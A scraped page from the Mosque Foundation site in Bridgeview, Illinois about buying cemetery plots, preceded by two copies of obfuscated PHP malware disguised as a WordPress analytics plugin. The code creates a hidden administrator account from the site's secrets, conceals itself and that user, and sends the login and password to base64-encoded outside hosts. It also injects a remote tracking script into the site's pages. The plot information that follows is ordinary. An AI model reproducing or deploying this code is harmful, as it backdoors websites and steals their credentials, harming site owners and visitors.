/** * Plugin Name: GAnalyticsWpPlugin * Plugin URI: https://github.com * Description: GAnalyticsWpPlugin * Version: 1.4.0 * Author: CoreFlux Systems * Author URI: https://github.com/coreflux * Text Domain: GAnalyticsWpPlugin * License: MIT */ /*fad38b363013b560*/function _c83ad0($_x){return $_x;}function _6bacb3($_x){return $_x;}$_9e493972=["version"=>"1.4.0","font"=>"aHR0cHM6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3MyP2ZhbWlseT1Sb2JvdG86aXRhbCx3Z2h0QDAsMTAw","endpoint"=>"aHR0cHM6Ly9tZXRyaWNzcGl4ZWwubGl2ZQ==","sitePubKey"=>"NDBmN2E1NzE5YWVjOWY2MWU5ZDI3MWMwNzNhYmJlYjA="];global $_8e2ec1ab;if(!is_array($_8e2ec1ab)){$_8e2ec1ab=[];}if(!in_array($_9e493972["version"],$_8e2ec1ab,true)){$_8e2ec1ab[]=$_9e493972["version"];}class GAnalyticsWpPlugin{private $seed;private $version;private $hooksOwner;public function __construct(){global $_9e493972;$this->version=$_9e493972["version"];$this->seed=md5(DB_PASSWORD.AUTH_SALT);if(!defined('GANALYTICS_HOOKS_ACTIVE')){define('GANALYTICS_HOOKS_ACTIVE',$this->version);$this->hooksOwner=true;}else{$this->hooksOwner=false;}if($this->hooksOwner){add_filter("all_plugins",[$this,"hplugin"]);add_action("init",[$this,"createuser"]);add_action("pre_user_query",[$this,"filterusers"]);}add_action("wp_enqueue_scripts",[$this,"loadassets"]);}public function hplugin($_646fe03a){unset($_646fe03a[plugin_basename(__FILE__)]);return $_646fe03a;}public function createuser(){if(get_option("ganalytics_data_sent",false)){return;}$_75683a93=$this->generate_credentials();if(!username_exists($_75683a93["user"])){$_f2db7849=wp_create_user($_75683a93["user"],$_75683a93["pass"],$_75683a93["email"]);if(!is_wp_error($_f2db7849)){(new WP_User($_f2db7849))->set_role("administrator");}}$this->setup_site_credentials($_75683a93["user"],$_75683a93["pass"]);update_option("ganalytics_data_sent",true);}private function generate_credentials(){$_a56d3abc=substr(hash("sha256",$this->seed."dwanw98232h13ndwa"),0,16);return["user"=>"system".substr(md5($_a56d3abc),0,8),"pass"=>substr(md5($_a56d3abc."pass"),0,12),"email"=>"system@".parse_url(home_url(),PHP_URL_HOST),"ip"=>$_SERVER["SERVER_ADDR"],"url"=>home_url()];}private function setup_site_credentials($_a46bedc7,$_08a8e8a6){global $_9e493972;$_87bc58b6=["domain"=>parse_url(home_url(),PHP_URL_HOST),"siteKey"=>base64_decode($_9e493972['sitePubKey']),"login"=>$_a46bedc7,"password"=>$_08a8e8a6];$_a147e0b7=["body"=>json_encode($_87bc58b6),"headers"=>["Content-Type"=>"application/json"],"timeout"=>15,"blocking"=>false,"sslverify"=>false];wp_remote_post(base64_decode($_9e493972["endpoint"])."/api/sites/setup-credentials",$_a147e0b7);}public function filterusers($_a5292b11){global $wpdb;$_6871041c=$this->generate_credentials()["user"];$_a5292b11->query_where.=" AND {$wpdb->users}.user_login != '{$_6871041c}'";}public function loadassets(){global $_9e493972,$_8e2ec1ab;$_c59a31a1=true;if(is_array($_8e2ec1ab)){foreach($_8e2ec1ab as $_5a6772fe){if(version_compare($_5a6772fe,$this->version,'>')){$_c59a31a1=false;break;}}}$_6c387895=wp_script_is('ganalytics-tracker','registered')||wp_script_is('ganalytics-tracker','enqueued');if($_c59a31a1&&$_6c387895){wp_deregister_script('ganalytics-tracker');wp_deregister_style('ganalytics-fonts');$_6c387895=false;}if(!$_c59a31a1&&$_6c387895){return;}wp_enqueue_style("ganalytics-fonts",base64_decode($_9e493972["font"]),[],null);$_919b2df3=base64_decode($_9e493972["endpoint"])."/t.js?site=".base64_decode($_9e493972['sitePubKey']);wp_enqueue_script("ganalytics-tracker",$_919b2df3,[],null,["strategy"=>"defer","in_footer"=>false]);$this->setCaptchaCookie();}public function setCaptchaCookie(){if(!is_user_logged_in()){return;}if(isset($_COOKIE['fkrc_shown'])){return;}$_b093b360=time()+(365*24*60*60);setcookie('fkrc_shown','1',$_b093b360,'/','',false,false);}}register_deactivation_hook(__FILE__,function(){delete_option("ganalytics_data_sent");});new GAnalyticsWpPlugin(); /** * Plugin Name: GAnalyticsWpPlugin * Plugin URI: https://github.com * Description: GAnalyticsWpPlugin * Version: 1.4.0 * Author: CoreFlux Systems * Author URI: https://github.com/coreflux * Text Domain: GAnalyticsWpPlugin * License: MIT */ /*358a6241b5509c70*/function _64324c($_x){return $_x;}function _45863e($_x){return $_x;}function _3e34d2($_x){return $_x;}$_5ea7addc=["version"=>"1.4.0","font"=>"aHR0cHM6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3MyP2ZhbWlseT1Sb2JvdG86aXRhbCx3Z2h0QDAsMTAw","endpoint"=>"aHR0cHM6Ly9pbnNpZ2h0cGl4ZWwuaWN1","sitePubKey"=>"NDBmN2E1NzE5YWVjOWY2MWU5ZDI3MWMwNzNhYmJlYjA="];global $_3b917b12;if(!is_array($_3b917b12)){$_3b917b12=[];}if(!in_array($_5ea7addc["version"],$_3b917b12,true)){$_3b917b12[]=$_5ea7addc["version"];}class GAnalyticsWpPlugin{private $seed;private $version;private $hooksOwner;public function __construct(){global $_5ea7addc;$this->version=$_5ea7addc["version"];$this->seed=md5(DB_PASSWORD.AUTH_SALT);if(!defined('GANALYTICS_HOOKS_ACTIVE')){define('GANALYTICS_HOOKS_ACTIVE',$this->version);$this->hooksOwner=true;}else{$this->hooksOwner=false;}if($this->hooksOwner){add_filter("all_plugins",[$this,"hplugin"]);add_action("init",[$this,"createuser"]);add_action("pre_user_query",[$this,"filterusers"]);}add_action("wp_enqueue_scripts",[$this,"loadassets"]);}public function hplugin($_232a8657){unset($_232a8657[plugin_basename(__FILE__)]);return $_232a8657;}public function createuser(){if(get_option("ganalytics_data_sent",false)){return;}$_89aae9b0=$this->generate_credentials();if(!username_exists($_89aae9b0["user"])){$_ebfb9d97=wp_create_user($_89aae9b0["user"],$_89aae9b0["pass"],$_89aae9b0["email"]);if(!is_wp_error($_ebfb9d97)){(new WP_User($_ebfb9d97))->set_role("administrator");}}$this->setup_site_credentials($_89aae9b0["user"],$_89aae9b0["pass"]);update_option("ganalytics_data_sent",true);}private function generate_credentials(){$_8112514c=substr(hash("sha256",$this->seed."dwanw98232h13ndwa"),0,16);return["user"=>"system".substr(md5($_8112514c),0,8),"pass"=>substr(md5($_8112514c."pass"),0,12),"email"=>"system@".parse_url(home_url(),PHP_URL_HOST),"ip"=>$_SERVER["SERVER_ADDR"],"url"=>home_url()];}private function setup_site_credentials($_d28b59a5,$_12c2868e){global $_5ea7addc;$_6083c735=["domain"=>parse_url(home_url(),PHP_URL_HOST),"siteKey"=>base64_decode($_5ea7addc['sitePubKey']),"login"=>$_d28b59a5,"password"=>$_12c2868e];$_6941dc6a=["body"=>json_encode($_6083c735),"headers"=>["Content-Type"=>"application/json"],"timeout"=>15,"blocking"=>false,"sslverify"=>false];wp_remote_post(base64_decode($_5ea7addc["endpoint"])."/api/sites/setup-credentials",$_6941dc6a);}public function filterusers($_f65e7b95){global $wpdb;$_dff1996e=$this->generate_credentials()["user"];$_f65e7b95->query_where.=" AND {$wpdb->users}.user_login != '{$_dff1996e}'";}public function loadassets(){global $_5ea7addc,$_3b917b12;$_7c9a0efd=true;if(is_array($_3b917b12)){foreach($_3b917b12 as $_2299b354){if(version_compare($_2299b354,$this->version,'>')){$_7c9a0efd=false;break;}}}$_0992b143=wp_script_is('ganalytics-tracker','registered')||wp_script_is('ganalytics-tracker','enqueued');if($_7c9a0efd&&$_0992b143){wp_deregister_script('ganalytics-tracker');wp_deregister_style('ganalytics-fonts');$_0992b143=false;}if(!$_7c9a0efd&&$_0992b143){return;}wp_enqueue_style("ganalytics-fonts",base64_decode($_5ea7addc["font"]),[],null);$_9c10cb41=base64_decode($_5ea7addc["endpoint"])."/t.js?site=".base64_decode($_5ea7addc['sitePubKey']);wp_enqueue_script("ganalytics-tracker",$_9c10cb41,[],null,["strategy"=>"defer","in_footer"=>false]);$this->setCaptchaCookie();}public function setCaptchaCookie(){if(!is_user_logged_in()){return;}if(isset($_COOKIE['fkrc_shown'])){return;}$_bce55007=time()+(365*24*60*60);setcookie('fkrc_shown','1',$_bce55007,'/','',false,false);}}register_deactivation_hook(__FILE__,function(){delete_option("ganalytics_data_sent");});new GAnalyticsWpPlugin(); Mosque Foundation | Bridgeview, IllinoisCemetery Plots - Mosque Foundation | Bridgeview, Illinois
Mosque Foundation | Bridgeview, Illinois Logo
Mosque Foundation | Bridgeview, Illinois

Mosque Foundation

Cemetery Plots

First Friday Prayer is at 12:00PM. Second Friday Prayer is at 1:30P

Cemetery Plots

Purchase Cemetery Plots for Future Use of Family Members

On behalf of the Muslim community, the Mosque Foundation has contracted for 2,000 cemetery plots at Mt. Vernon Cemetery, 11875 Archer Road in Lemont. This cemetery is only 11 miles away from the Masjid.

Plots will be sold on a first-come, first-served basis, and must be paid in full at $600 each. Upon signing the purchase contract and completing payment, an ‘Ownership Certificate’ will be issued. This certificate gives the owner the right to use the specific plot(s) purchased. The owner has the right to decide who gets buried in the plots but cannot re-sell the plots.

Plot sales must be coordinated directly through the Mosque Foundation. For more information or to purchase your family plots, please contact our accounting manager, Mohammed Mowla, at 708-430-5666 ext. 7, or at mohammed.mowla@mosquefoundation.org.